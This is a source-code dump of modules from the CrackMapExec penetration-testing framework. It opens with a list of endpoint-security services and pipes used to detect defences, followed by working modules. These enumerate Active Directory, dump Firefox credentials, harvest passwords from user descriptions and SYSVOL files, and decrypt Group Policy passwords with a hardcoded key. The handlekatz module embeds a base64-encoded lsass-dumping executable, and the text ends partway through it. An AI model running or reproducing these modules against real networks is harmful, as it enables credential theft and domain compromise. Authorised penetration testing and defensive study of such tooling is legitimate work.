"name": "CybereasonBlocki",
"description": "Cybereason Execution Prevention",
},
],
"pipes": [
{
"name": "CybereasonAPConsoleMinionHostIpc_*",
"processes": ["minionhost.exe"],
},
{
"name": "CybereasonAPServerProxyIpc_*",
"processes": ["minionhost.exe"],
},
],
},
{
"name": "Kaspersky Security for Windows Server",
"services": [
{
"name": "kavfsslp",
"description": "Kaspersky Security Exploit Prevention Service",
},
{
"name": "KAVFS",
"description": "Kaspersky Security Service",
},
{
"name": "KAVFSGT",
"description": "Kaspersky Security Management Service",
},
{
"name": "klnagent",
"description": "Kaspersky Security Center",
},
],
"pipes": [
{
"name": "Exploit_Blocker",
"processes": ["kavfswh.exe"],
},
],
},
{
"name": "Trend Micro Endpoint Security",
"services": [
{
"name": "Trend Micro Endpoint Basecamp",
"description": "Trend Micro Endpoint Basecamp",
},
{
"name": "TMBMServer",
"description": "Trend Micro Unauthorized Change Prevention Service",
},
{
"name": "Trend Micro Web Service Communicator",
"description": "Trend Micro Web Service Communicator",
},
{
"name": "TMiACAgentSvc",
"description": "Trend Micro Application Control Service (Agent)",
},
{
"name": "CETASvc",
"description": "Trend Micro Cloud Endpoint Telemetry Service",
},
{
"name": "iVPAgent",
"description": "Trend Micro Vulnerability Protection Service (Agent)",
}
],
"pipes": [
{
"name": "IPC_XBC_XBC_AGENT_PIPE_*",
"processes": ["EndpointBasecamp.exe"],
},
{
"name": "iacagent_*",
"processes": ["TMiACAgentSvc.exe"],
},
{
"name": "OIPC_LWCS_PIPE_*",
"processes": ["TmListen.exe"],
},
{
"name": "Log_ServerNamePipe",
"processes": ["LogServer.exe"],
},
{
"name": "OIPC_NTRTSCAN_PIPE_*",
"processes": ["Ntrtscan.exe"],
},
],
},
{
"name": "Symantec Endpoint Protection",
"services": [
{
"name": "SepMasterService",
"description": "Symantec Endpoint Protection",
},
{
"name": "SepScanService",
"description": "Symantec Endpoint Protection Scan Services",
},
{"name": "SNAC", "description": "Symantec Network Access Control"},
],
"pipes": [],
},
{
"name": "Sophos Intercept X",
"services": [
{
"name": "SntpService",
"description": "Sophos Network Threat Protection"
},
{
"name": "Sophos Endpoint Defense Service",
"description": "Sophos Endpoint Defense Service"
},
{
"name": "Sophos File Scanner Service",
"description": "Sophos File Scanner Service"
},
{
"name": "Sophos Health Service",
"description": "Sophos Health Service"
},
{
"name": "Sophos Live Query",
"description": "Sophos Live Query"
},
{
"name": "Sophos Managed Threat Response",
"description": "Sophos Managed Threat Response"
},
{
"name": "Sophos MCS Agent",
"description": "Sophos MCS Agent"
},
{
"name": "Sophos MCS Client",
"description": "Sophos MCS Client"
},
{
"name": "Sophos System Protection Service",
"description": "Sophos System Protection Service"
}
],
"pipes": [
{"name": "SophosUI", "processes": [""]},
{"name": "SophosEventStore", "processes": [""]},
{"name": "sophos_deviceencryption", "processes": [""]},
{"name": "sophoslivequery_*", "processes": [""]},
],
},
{
"name": "G DATA Security Client",
"services": [
{
"name": "AVKWCtl",
"description": "Anti-virus Kit Window Control",
},
{
"name": "AVKProxy",
"description": "G Data AntiVirus Proxy Service"
},
{
"name": "GDScan",
"description": "GDSG Data AntiVirus Scan Service",
},
],
"pipes": [
{
"name": "exploitProtectionIPC",
"processes": ["AVKWCtlx64.exe"],
},
],
},
{
"name": "Panda Adaptive Defense 360",
"services": [
{
"name": "PandaAetherAgent",
"description": "Panda Endpoint Agent",
},
{
"name": "PSUAService",
"description": "Panda Product Service"
},
{
"name": "NanoServiceMain",
"description": "Panda Cloud Antivirus Service",
},
],
"pipes": [
{
"name": "NNS_API_IPC_SRV_ENDPOINT",
"processes": ["PSANHost.exe"],
},
{
"name": "PSANMSrvcPpal",
"processes": ["PSUAService.exe"],
},
],
}
]
}
================================================
FILE: cme/modules/enum_dns.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from datetime import datetime
from cme.helpers.logger import write_log
class CMEModule:
"""
Uses WMI to dump DNS from an AD DNS Server.
Module by @fang0654
"""
name = "enum_dns"
description = "Uses WMI to dump DNS from an AD DNS Server"
supported_protocols = ["smb", "wmi"]
opsec_safe = True
multiple_hosts = True
def __init__(self, context=None, module_options=None):
self.context = context
self.module_options = module_options
self.domains = None
def options(self, context, module_options):
"""
DOMAIN Domain to enumerate DNS for. Defaults to all zones.
"""
self.domains = None
if module_options and "DOMAIN" in module_options:
self.domains = module_options["DOMAIN"]
def on_admin_login(self, context, connection):
if not self.domains:
domains = []
output = connection.wmi("Select Name FROM MicrosoftDNS_Zone", "root\\microsoftdns")
if output:
for result in output:
domains.append(result["Name"]["value"])
context.log.success("Domains retrieved: {}".format(domains))
else:
domains = [self.domains]
data = ""
for domain in domains:
output = connection.wmi(
f"Select TextRepresentation FROM MicrosoftDNS_ResourceRecord WHERE DomainName = {domain}",
"root\\microsoftdns",
)
if output:
domain_data = {}
context.log.highlight(f"Results for {domain}")
data += f"Results for {domain}\n"
for entry in output:
text = entry["TextRepresentation"]["value"]
rname = text.split(" ")[0]
rtype = text.split(" ")[2]
rvalue = " ".join(text.split(" ")[3:])
if domain_data.get(rtype, False):
domain_data[rtype].append(f"{rname}: {rvalue}")
else:
domain_data[rtype] = [f"{rname}: {rvalue}"]
for k, v in sorted(domain_data.items()):
context.log.highlight(f"Record Type: {k}")
data += f"Record Type: {k}\n"
for d in sorted(v):
context.log.highlight("\t" + d)
data += "\t" + d + "\n"
log_name = "DNS-Enum-{}-{}.log".format(connection.host, datetime.now().strftime("%Y-%m-%d_%H%M%S"))
write_log(data, log_name)
context.log.display(f"Saved raw output to ~/.cme/logs/{log_name}")
================================================
FILE: cme/modules/example_module.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
class CMEModule:
"""
Example
Module by @yomama
"""
name = "example module"
description = "I do something"
supported_protocols = [] # Example: ['smb', 'mssql']
opsec_safe = True # Does the module touch disk?
multiple_hosts = True # Does it make sense to run this module on multiple hosts at a time?
def __init__(self, context=None, module_options=None):
self.context = context
self.module_options = module_options
def options(self, context, module_options):
"""Required.
Module options get parsed here. Additionally, put the modules usage here as well
"""
pass
def on_login(self, context, connection):
"""Concurrent.
Required if on_admin_login is not present. This gets called on each authenticated connection
"""
# Logging best practice
# Mostly you should use these functions to display information to the user
context.log.display("I'm doing something") # Use this for every normal message ([*] I'm doing something)
context.log.success("I'm doing something") # Use this for when something succeeds ([+] I'm doing something)
context.log.fail("I'm doing something") # Use this for when something fails ([-] I'm doing something), for example a remote registry entry is missing which is needed to proceed
context.log.highlight("I'm doing something") # Use this for when something is important and should be highlighted, printing credentials for example
# These are for debugging purposes
context.log.info("I'm doing something") # This will only be displayed if the user has specified the --verbose flag, so add additional info that might be useful
context.log.debug("I'm doing something") # This will only be displayed if the user has specified the --debug flag, so add info that you would might need for debugging errors
# These are for more critical error handling
context.log.error("I'm doing something") # This will not be printed in the module context and should only be used for critical errors (e.g. a required python file is missing)
try:
raise Exception("Exception that might occure")
except Exception as e:
context.log.exception(f"Exception occured: {e}") # This will display an exception traceback screen after an exception was raised and should only be used for critical errors
def on_admin_login(self, context, connection):
"""Concurrent.
Required if on_login is not present
This gets called on each authenticated connection with Administrative privileges
"""
pass
def on_request(self, context, request):
"""Optional.
If the payload needs to retrieve additional files, add this function to the module
"""
pass
def on_response(self, context, response):
"""Optional.
If the payload sends back its output to our server, add this function to the module to handle its output
"""
pass
def on_shutdown(self, context, connection):
"""Optional.
Do something on shutdown
"""
pass
================================================
FILE: cme/modules/find-computer.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import socket
import sys
class CMEModule:
'''
Module by CyberCelt: @Cyb3rC3lt
Initial module:
https://github.com/Cyb3rC3lt/CrackMapExec-Modules
'''
name = 'find-computer'
description = 'Finds computers in the domain via the provided text'
supported_protocols = ['ldap']
opsec_safe = True
multiple_hosts = False
def options(self, context, module_options):
'''
find-computer: Specify find-computer to call the module
TEXT: Specify the TEXT option to enter your text to search for
Usage: cme ldap $DC-IP -u Username -p Password -M find-computer -o TEXT="server"
cme ldap $DC-IP -u Username -p Password -M find-computer -o TEXT="SQL"
'''
self.TEXT = ''
if 'TEXT' in module_options:
self.TEXT = module_options['TEXT']
else:
context.log.error('TEXT option is required!')
exit(1)
def on_login(self, context, connection):
# Building the search filter
searchFilter = "(&(objectCategory=computer)(&(|(operatingSystem=*"+self.TEXT+"*)(name=*"+self.TEXT+"*))))"
try:
context.log.debug('Search Filter=%s' % searchFilter)
resp = connection.ldapConnection.search(searchFilter=searchFilter,
attributes=['dNSHostName','operatingSystem'],
sizeLimit=0)
except ldap_impacket.LDAPSearchError as e:
if e.getErrorString().find('sizeLimitExceeded') >= 0:
context.log.debug('sizeLimitExceeded exception caught, giving up and processing the data received')
resp = e.getAnswers()
pass
else:
logging.debug(e)
return False
answers = []
context.log.debug('Total no. of records returned %d' % len(resp))
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
dNSHostName = ''
operatingSystem = ''
try:
for attribute in item['attributes']:
if str(attribute['type']) == 'dNSHostName':
dNSHostName = str(attribute['vals'][0])
elif str(attribute['type']) == 'operatingSystem':
operatingSystem = attribute['vals'][0]
if dNSHostName != '' and operatingSystem != '':
answers.append([dNSHostName,operatingSystem])
except Exception as e:
context.log.debug("Exception:", exc_info=True)
context.log.debug('Skipping item, cannot process due to error %s' % str(e))
pass
if len(answers) > 0:
context.log.success('Found the following computers: ')
for answer in answers:
try:
IP = socket.gethostbyname(answer[0])
context.log.highlight(u'{} ({}) ({})'.format(answer[0],answer[1],IP))
context.log.debug('IP found')
except socket.gaierror as e:
context.log.debug('Missing IP')
context.log.highlight(u'{} ({}) ({})'.format(answer[0],answer[1],"No IP Found"))
else:
context.log.success('Unable to find any computers with the text "' + self.TEXT + '"')
================================================
FILE: cme/modules/firefox.py
================================================
#!/usr/bin/env python3
from dploot.lib.target import Target
from cme.protocols.smb.firefox import FirefoxTriage
class CMEModule:
"""
Firefox by @zblurx
Inspired by firefox looting from DonPAPI
https://github.com/login-securite/DonPAPI
"""
name = "firefox"
description = "Dump credentials from Firefox"
supported_protocols = ["smb"]
opsec_safe = True # Does the module touch disk?
multiple_hosts = True # Does it make sense to run this module on multiple hosts at a time?
def options(self, context, module_options):
"""Dump credentials from Firefox"""
pass
def on_admin_login(self, context, connection):
host = connection.hostname + "." + connection.domain
domain = connection.domain
username = connection.username
kerberos = connection.kerberos
aesKey = connection.aesKey
use_kcache = getattr(connection, "use_kcache", False)
password = getattr(connection, "password", "")
lmhash = getattr(connection, "lmhash", "")
nthash = getattr(connection, "nthash", "")
target = Target.create(
domain=domain,
username=username,
password=password,
target=host,
lmhash=lmhash,
nthash=nthash,
do_kerberos=kerberos,
aesKey=aesKey,
use_kcache=use_kcache,
)
try:
# Collect Firefox stored secrets
firefox_triage = FirefoxTriage(target=target, logger=context.log)
firefox_triage.upgrade_connection(connection=connection.conn)
firefox_credentials = firefox_triage.run()
for credential in firefox_credentials:
context.log.highlight(
"[%s][FIREFOX] %s %s:%s"
% (
credential.winuser,
credential.url + " -" if credential.url != "" else "-",
credential.username,
credential.password,
)
)
except Exception as e:
context.log.debug("Error while looting firefox: {}".format(e))
================================================
FILE: cme/modules/get-desc-users.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from impacket.ldap import ldapasn1 as ldapasn1_impacket
from impacket.ldap import ldap as ldap_impacket
import re
from cme.logger import cme_logger
class CMEModule:
"""
Get description of users
Module by @nodauf
"""
name = "get-desc-users"
description = "Get description of the users. May contained password"
supported_protocols = ["ldap"]
opsec_safe = True # Does the module touch disk?
multiple_hosts = True # Does it make sense to run this module on multiple hosts at a time?
def options(self, context, module_options):
"""
FILTER Apply the FILTER (grep-like) (default: '')
PASSWORDPOLICY Is the windows password policy enabled ? (default: False)
MINLENGTH Minimum password length to match, only used if PASSWORDPOLICY is True (default: 6)
"""
self.FILTER = ""
self.MINLENGTH = "6"
self.PASSWORDPOLICY = False
if "FILTER" in module_options:
self.FILTER = module_options["FILTER"]
if "MINLENGTH" in module_options:
self.MINLENGTH = module_options["MINLENGTH"]
if "PASSWORDPOLICY" in module_options:
self.PASSWORDPOLICY = True
self.regex = re.compile("((?=[^ ]*[A-Z])(?=[^ ]*[a-z])(?=[^ ]*\d)|(?=[^ ]*[a-z])(?=[^ ]*\d)(?=[^ ]*[^\w \n])|(?=[^ ]*[A-Z])(?=[^ ]*\d)(?=[^ ]*[^\w \n])|(?=[^ ]*[A-Z])(?=[^ ]*[a-z])(?=[^ ]*[^\w \n]))[^ \n]{" + self.MINLENGTH + ",}") # Credit : https://stackoverflow.com/questions/31191248/regex-password-must-have-at-least-3-of-the-4-of-the-following
def on_login(self, context, connection):
"""Concurrent. Required if on_admin_login is not present. This gets called on each authenticated connection"""
# Building the search filter
searchFilter = "(objectclass=user)"
try:
context.log.debug("Search Filter=%s" % searchFilter)
resp = connection.ldapConnection.search(
searchFilter=searchFilter,
attributes=["sAMAccountName", "description"],
sizeLimit=0,
)
except ldap_impacket.LDAPSearchError as e:
if e.getErrorString().find("sizeLimitExceeded") >= 0:
context.log.debug("sizeLimitExceeded exception caught, giving up and processing the data received")
# We reached the sizeLimit, process the answers we have already and that's it. Until we implement
# paged queries
resp = e.getAnswers()
pass
else:
cme_logger.debug(e)
return False
answers = []
context.log.debug("Total of records returned %d" % len(resp))
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
sAMAccountName = ""
description = ""
try:
for attribute in item["attributes"]:
if str(attribute["type"]) == "sAMAccountName":
sAMAccountName = str(attribute["vals"][0])
elif str(attribute["type"]) == "description":
description = attribute["vals"][0]
if sAMAccountName != "" and description != "":
answers.append([sAMAccountName, description])
except Exception as e:
context.log.debug("Exception:", exc_info=True)
context.log.debug("Skipping item, cannot process due to error %s" % str(e))
pass
answers = self.filter_answer(context, answers)
if len(answers) > 0:
context.log.success("Found following users: ")
for answer in answers:
context.log.highlight("User: {} description: {}".format(answer[0], answer[1]))
def filter_answer(self, context, answers):
# No option to filter
if self.FILTER == "" and not self.PASSWORDPOLICY:
context.log.debug("No filter option enabled")
return answers
answersFiltered = []
context.log.debug("Prepare to filter")
if len(answers) > 0:
for answer in answers:
conditionFilter = False
description = str(answer[1])
# Filter
if self.FILTER != "":
conditionFilter = False
if self.FILTER in description:
conditionFilter = True
# Password policy
if self.PASSWORDPOLICY:
conditionPasswordPolicy = False
if self.regex.search(description):
conditionPasswordPolicy = True
if self.FILTER and conditionFilter and self.PASSWORDPOLICY and conditionPasswordPolicy:
answersFiltered.append([answer[0], description])
elif not self.FILTER and self.PASSWORDPOLICY and conditionPasswordPolicy:
answersFiltered.append([answer[0], description])
elif not self.PASSWORDPOLICY and self.FILTER and conditionFilter:
answersFiltered.append([answer[0], description])
return answersFiltered
================================================
FILE: cme/modules/get_netconnections.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from datetime import datetime
from cme.helpers.logger import write_log
import json
class CMEModule:
"""
Uses WMI to extract network connections, used to find multi-homed hosts.
Module by @fang0654
"""
name = "get_netconnections"
description = "Uses WMI to query network connections."
supported_protocols = ["smb", "wmi"]
opsec_safe = True
multiple_hosts = True
def options(self, context, module_options):
"""
No options
"""
pass
def on_admin_login(self, context, connection):
data = []
cards = connection.wmi(f"select DNSDomainSuffixSearchOrder, IPAddress from win32_networkadapterconfiguration")
if cards:
for c in cards:
if c["IPAddress"].get("value"):
context.log.success(f"IP Address: {c['IPAddress']['value']}\tSearch Domain: {c['DNSDomainSuffixSearchOrder']['value']}")
data.append(cards)
log_name = "network-connections-{}-{}.log".format(connection.host, datetime.now().strftime("%Y-%m-%d_%H%M%S"))
write_log(json.dumps(data), log_name)
context.log.display(f"Saved raw output to ~/.cme/logs/{log_name}")
================================================
FILE: cme/modules/gpp_autologin.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import xml.etree.ElementTree as ET
from io import BytesIO
class CMEModule:
"""
Reference: https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPAutologon.ps1
Module by @byt3bl33d3r
"""
name = "gpp_autologin"
description = "Searches the domain controller for registry.xml to find autologon information and returns the username and password."
supported_protocols = ["smb"]
opsec_safe = True
multiple_hosts = True
def options(self, context, module_options):
""" """
def on_login(self, context, connection):
shares = connection.shares()
for share in shares:
if share["name"] == "SYSVOL" and "READ" in share["access"]:
context.log.success("Found SYSVOL share")
context.log.display("Searching for Registry.xml")
paths = connection.spider("SYSVOL", pattern=["Registry.xml"])
for path in paths:
context.log.display("Found {}".format(path))
buf = BytesIO()
connection.conn.getFile("SYSVOL", path, buf.write)
xml = ET.fromstring(buf.getvalue())
if xml.findall('.//Properties[@name="DefaultPassword"]'):
usernames = []
passwords = []
domains = []
xml_section = xml.findall(".//Properties")
for section in xml_section:
attrs = section.attrib
if attrs["name"] == "DefaultPassword":
passwords.append(attrs["value"])
if attrs["name"] == "DefaultUserName":
usernames.append(attrs["value"])
if attrs["name"] == "DefaultDomainName":
domains.append(attrs["value"])
if usernames or passwords:
context.log.success("Found credentials in {}".format(path))
context.log.highlight("Usernames: {}".format(usernames))
context.log.highlight("Domains: {}".format(domains))
context.log.highlight("Passwords: {}".format(passwords))
================================================
FILE: cme/modules/gpp_password.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import xml.etree.ElementTree as ET
from Cryptodome.Cipher import AES
from base64 import b64decode
from binascii import unhexlify
from io import BytesIO
class CMEModule:
"""
Reference: https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1
Module by @byt3bl33d3r
"""
name = "gpp_password"
description = "Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences."
supported_protocols = ["smb"]
opsec_safe = True
multiple_hosts = True
def options(self, context, module_options):
""" """
def on_login(self, context, connection):
shares = connection.shares()
for share in shares:
if share["name"] == "SYSVOL" and "READ" in share["access"]:
context.log.success("Found SYSVOL share")
context.log.display("Searching for potential XML files containing passwords")
paths = connection.spider(
"SYSVOL",
pattern=[
"Groups.xml",
"Services.xml",
"Scheduledtasks.xml",
"DataSources.xml",
"Printers.xml",
"Drives.xml",
],
)
for path in paths:
context.log.display("Found {}".format(path))
buf = BytesIO()
connection.conn.getFile("SYSVOL", path, buf.write)
xml = ET.fromstring(buf.getvalue())
sections = []
if "Groups.xml" in path:
sections.append("./User/Properties")
elif "Services.xml" in path:
sections.append("./NTService/Properties")
elif "ScheduledTasks.xml" in path:
sections.append("./Task/Properties")
sections.append("./ImmediateTask/Properties")
sections.append("./ImmediateTaskV2/Properties")
sections.append("./TaskV2/Properties")
elif "DataSources.xml" in path:
sections.append("./DataSource/Properties")
elif "Printers.xml" in path:
sections.append("./SharedPrinter/Properties")
elif "Drives.xml" in path:
sections.append("./Drive/Properties")
for section in sections:
xml_section = xml.findall(section)
for attr in xml_section:
props = attr.attrib
if "cpassword" in props:
for user_tag in [
"userName",
"accountName",
"runAs",
"username",
]:
if user_tag in props:
username = props[user_tag]
password = self.decrypt_cpassword(props["cpassword"])
context.log.success("Found credentials in {}".format(path))
context.log.highlight("Password: {}".format(password))
for k, v in props.items():
if k != "cpassword":
context.log.highlight("{}: {}".format(k, v))
hostid = context.db.get_hosts(connection.host)[0][0]
context.db.add_credential(
"plaintext",
"",
username,
password,
pillaged_from=hostid,
)
def decrypt_cpassword(self, cpassword):
# Stolen from hhttps://gist.github.com/andreafortuna/4d32100ae03abead52e8f3f61ab70385
# From MSDN: http://msdn.microsoft.com/en-us/library/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be%28v=PROT.13%29#endNote2
key = unhexlify("4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")
cpassword += "=" * ((4 - len(cpassword) % 4) % 4)
password = b64decode(cpassword)
IV = "\x00" * 16
decypted = AES.new(key, AES.MODE_CBC, IV.encode("utf8")).decrypt(password)
return decypted.decode().rstrip()
================================================
FILE: cme/modules/group_members.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from impacket.ldap import ldapasn1 as ldapasn1_impacket
class CMEModule:
'''
Module by CyberCelt: @Cyb3rC3lt
Initial module:
https://github.com/Cyb3rC3lt/CrackMapExec-Modules
'''
name = 'group-mem'
description = 'Retrieves all the members within a Group'
supported_protocols = ['ldap']
opsec_safe = True
multiple_hosts = False
primaryGroupID = ''
answers = []
def options(self, context, module_options):
'''
group-mem: Specify group-mem to call the module
GROUP: Specify the GROUP option to query for that group's members
Usage: cme ldap $DC-IP -u Username -p Password -M group-mem -o GROUP="domain admins"
cme ldap $DC-IP -u Username -p Password -M group-mem -o GROUP="domain controllers"
'''
self.GROUP = ''
if 'GROUP' in module_options:
self.GROUP = module_options['GROUP']
else:
context.log.error('GROUP option is required!')
exit(1)
def on_login(self, context, connection):
#First look up the SID of the group passed in
searchFilter = "(&(objectCategory=group)(cn=" + self.GROUP + "))"
attribute = "objectSid"
searchResult = doSearch(self, context, connection, searchFilter, attribute)
#If no SID for the Group is returned exit the program
if searchResult is None:
context.log.success('Unable to find any members of the "' + self.GROUP + '" group')
return True
# Convert the binary SID to a primaryGroupID string to be used further
sidString = connection.sid_to_str(searchResult).split("-")
self.primaryGroupID = sidString[-1]
#Look up the groups DN
searchFilter = "(&(objectCategory=group)(cn=" + self.GROUP + "))"
attribute = "distinguishedName"
distinguishedName = (doSearch(self, context, connection, searchFilter, attribute)).decode("utf-8")
# Carry out the search
searchFilter = "(|(memberOf="+distinguishedName+")(primaryGroupID="+self.primaryGroupID+"))"
attribute = "sAMAccountName"
searchResult = doSearch(self, context, connection, searchFilter, attribute)
if len(self.answers) > 0:
context.log.success('Found the following members of the ' + self.GROUP + ' group:')
for answer in self.answers:
context.log.highlight(u'{}'.format(answer[0]))
# Carry out an LDAP search for the Group with the supplied Group name
def doSearch(self,context, connection,searchFilter,attributeName):
try:
context.log.debug('Search Filter=%s' % searchFilter)
resp = connection.ldapConnection.search(searchFilter=searchFilter,
attributes=[attributeName],
sizeLimit=0)
context.log.debug('Total no. of records returned %d' % len(resp))
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
attributeValue = '';
try:
for attribute in item['attributes']:
if str(attribute['type']) == attributeName:
if attributeName == "objectSid":
attributeValue = bytes(attribute['vals'][0])
return attributeValue;
elif attributeName == "distinguishedName":
attributeValue = bytes(attribute['vals'][0])
return attributeValue;
else:
attributeValue = str(attribute['vals'][0])
if attributeValue is not None:
self.answers.append([attributeValue])
except Exception as e:
context.log.debug("Exception:", exc_info=True)
context.log.debug('Skipping item, cannot process due to error %s' % str(e))
pass
except Exception as e:
context.log.debug("Exception:", e)
return False
================================================
FILE: cme/modules/groupmembership.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from impacket.ldap import ldapasn1 as ldapasn1_impacket
from impacket.ldap import ldap as ldap_impacket
class CMEModule:
"""
Created as a contributtion from HackTheBox Academy team for CrackMapExec
Reference: https://academy.hackthebox.com/module/details/84
Module by @juliourena
Based on: https://github.com/juliourena/CrackMapExec/blob/master/cme/modules/get_description.py
"""
name = "groupmembership"
description = "Query the groups to which a user belongs."
supported_protocols = ["ldap"]
opsec_safe = True
multiple_hosts = True
def options(self, context, module_options):
"""
USER Choose a username to query group membership
"""
self.user = ""
if "USER" in module_options:
if module_options["USER"] == "":
context.log.fail("Invalid value for USER option!")
exit(1)
self.user = module_options["USER"]
else:
context.log.fail("Missing USER option, use --options to list available parameters")
exit(1)
def on_login(self, context, connection):
"""Concurrent. Required if on_admin_login is not present. This gets called on each authenticated connection"""
# Building the search filter
searchFilter = "(&(objectClass=user)(sAMAccountName={}))".format(self.user)
try:
context.log.debug("Search Filter=%s" % searchFilter)
resp = connection.ldapConnection.search(
searchFilter=searchFilter,
attributes=["memberOf", "primaryGroupID"],
sizeLimit=0,
)
except ldap_impacket.LDAPSearchError as e:
if e.getErrorString().find("sizeLimitExceeded") >= 0:
context.log.debug("sizeLimitExceeded exception caught, giving up and processing the data received")
# We reached the sizeLimit, process the answers we have already and that's it. Until we implement
# paged queries
resp = e.getAnswers()
pass
else:
context.log.debug(e)
return False
memberOf = []
primaryGroupID = ""
context.log.debug("Total of records returned %d" % len(resp))
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
try:
for attribute in item["attributes"]:
if str(attribute["type"]) == "primaryGroupID":
primaryGroupID = attribute["vals"][0]
# Hardcode value for Domain Users primary Group ID 513
# For future improvement maybe we can query the primary ID value
# Reference: https://social.technet.microsoft.com/Forums/Azure/en-US/373febac-665c-494d-91f7-834541c74bee/cant-get-all-member-objects-from-domain-users-in-ldap?forum=winserverDS
if str(primaryGroupID) == "513":
memberOf.append("CN=Domain Users,CN=Users,DC=XXXXX,DC=XXX")
elif str(attribute["type"]) == "memberOf":
for group in attribute["vals"]:
if isinstance(group._value, bytes):
memberOf.append(str(group))
except Exception as e:
context.log.debug("Exception:", exc_info=True)
context.log.debug("Skipping item, cannot process due to error %s" % str(e))
pass
if len(memberOf) > 0:
context.log.success("User: {} is member of following groups: ".format(self.user))
for group in memberOf:
# Split the string on the "," character to get a list of the group name and parent group names
group_parts = group.split(",")
# The group name is the first element in the list, so we can extract it by taking the first element of the list
# and splitting it on the "=" character to get a list of the group name and its prefix (e.g., "CN")
group_name = group_parts[0].split("=")[1]
# print("Group name: %s" % group_name)
context.log.highlight("{}".format(group_name))
================================================
FILE: cme/modules/handlekatz.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# handlekatz module for CME python3
# author of the module : github.com/mpgn
# HandleKatz: https://github.com/codewhitesec/HandleKatz
import base64
import re
import sys
from cme.helpers.bloodhound import add_user_bh
class CMEModule:
name = "handlekatz"
description = "Get lsass dump using handlekatz64 and parse the result with pypykatz"
supported_protocols = ["smb"]
opsec_safe = False
multiple_hosts = True
def options(self, context, module_options):
"""
TMP_DIR Path where process dump should be saved on target system (default: C:\\Windows\\Temp\\)
HANDLEKATZ_PATH Path where handlekatz.exe is on your system (default: /tmp/)
HANDLEKATZ_EXE_NAME Name of the handlekatz executable (default: handlekatz.exe)
DIR_RESULT Location where the dmp are stored (default: DIR_RESULT = HANDLEKATZ_PATH)
"""
self.tmp_dir = "C:\\Windows\\Temp\\"
self.share = "C$"
self.tmp_share = self.tmp_dir.split(":")[1]
self.handlekatz_embeded = base64.b64decode(
"TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAAZIYJAPd2cmEAAAAAAAAAAPAALwILAgIjAHAAAADsAAAADAAA4BQAAAAQAAAAAEAAAAAAAAAQAAAAAgAABAAAAAAAAAAFAAIAAAAAAABQAQAABAAAAXABAAMAAAAAACAAAAAAAAAQAAAAAAAAAAAQAAAAAAAAEAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAIAEALAgAAAAAAAAAAAAAAPAAAJgEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIOEAACgAAAAAAAAAAAAAAAAAAAAAAAAAKCIBANgBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAudGV4dAAAAHhvAAAAEAAAAHAAAAAEAAAAAAAAAAAAAAAAAABgAFBgLmRhdGEAAABgUAAAAIAAAABSAAAAdAAAAAAAAAAAAAAAAAAAQABgwC5yZGF0YQAAgA4AAADgAAAAEAAAAMYAAAAAAAAAAAAAAAAAAEAAYEAucGRhdGEAAJgEAAAA8AAAAAYAAADWAAAAAAAAAAAAAAAAAABAADBALnhkYXRhAABEBAAAAAABAAAGAAAA3AAAAAAAAAAAAAAAAAAAQAAwQC5ic3MAAAAAoAsAAAAQAQAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAYMAuaWRhdGEAACwIAAAAIAEAAAoAAADiAAAAAAAAAAAAAAAAAABAADDALkNSVAAAAABoAAAAADABAAACAAAA7AAAAAAAAAAAAAAAAAAAQABAwC50bHMAAAAAEAAAAABAAQAAAgAAAO4AAAAAAAAAAAAAAAAAAEAAQMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMNmZi4PH4QAAAAAAA8fQABIg+woSIsF9dgAADHJxwABAAAASIsF9tgAAMcAAQAAAEiLBfnYAADHAAEAAABIiwW82AAAxwABAAAASIsFb9cAAGaBOE1adQ9IY1A8SAHQgThQRQAAdGlIiwWC2AAAiQ2s/wAAiwCFwHRGuQIAAADoDGcAAOiXbQAASIsVINgAAIsSiRDod20AAEiLFfDXAACLEokQ6PcIAABIiwXA1gAAgzgBdFMxwEiDxCjDDx9AALkBAAAA6MZmAADruA8fQAAPt1AYZoH6CwF0RWaB+gsCdYWDuIQAAAAOD4Z4////i5D4AAAAMcmF0g+Vwelm////Dx+AAAAAAEiNDXEJAADoPA8AADHASIPEKMMPH0QAAIN4dA4Phj3///